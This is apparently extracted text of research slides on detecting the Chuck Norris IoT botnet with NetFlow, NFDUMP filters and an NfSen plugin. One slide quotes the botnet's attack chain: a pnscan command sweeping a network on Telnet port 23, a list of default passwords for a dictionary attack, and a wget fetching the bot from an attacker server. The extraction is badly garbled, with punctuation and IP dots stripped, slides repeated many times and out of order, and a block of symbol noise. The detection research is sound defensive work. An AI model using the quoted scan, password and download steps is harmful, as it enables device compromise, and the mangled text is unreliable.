Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Botnet Lifecycle
Scanning for vulnerable devices in predefined networksIP prefixes of ADSL networks of worldwide operatorsnetwork scanning ndash pnscan -n30 88102106024 23
Infection of a vulnerable deviceTELNET dictionary attack ndash 15 default passwordsadmin password root 1234 dreambox blank password
IRC bot initializationIRC bot download and execution on infected device wget http879816386pwnsyslgd
Botnet CampC operationsfurther bots spreading and CampC commands executionDNS spoofing and denial-of-service attacks
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 10 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
More about Chuck Norris Botnet
Chuck Norris botnet lifecycle in details and furtherinformation are available at the CYBER project page
httpwwwmuniczicscyberchuck_norris_botnet
3 wget scan-tools
webserver
2 Topic init-cmd (get scan-tools)
1 join soldiersCampC(IRC)serverSTOP
bot
stop remote access(ports 22-80)
infecteddevice
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 11 28
Part III
Botnet Detection Methods
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 12 28
Detection Methods Overview
Five Detection Methods
Telnet scan detectionConnections to botnet distribution sites detectionConnections to botnet CampC centers detectionDNS spoofing attack detectionADSL string detection
Methods Correspond to Botnet Lifecycle
Applied to NetFlow Data
Defined as NFDUMP filtersImplemented to NfSen collector
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 13 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
NFDUMP detection filter
(net local_network) and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
NFDUMP detection filter(net local_network)
and (dst port 23) and (proto TCP) and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP)
and((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Telnet Scan Detection ndash Phase I
Incoming and outgoing TCP SYN scans on port 23
infecteddevice
localnetwork
list of C classnetworks to scan
1472513x14725118x
14725120x
1472514x
TCP23
1961428x
2141283x
SYNRESET flags
NFDUMP detection filter(net local_network) and (dst port 23) and (proto TCP) and
((flags S and not flags ARPUF) or (flags SR and not flags APUF))
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 14 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
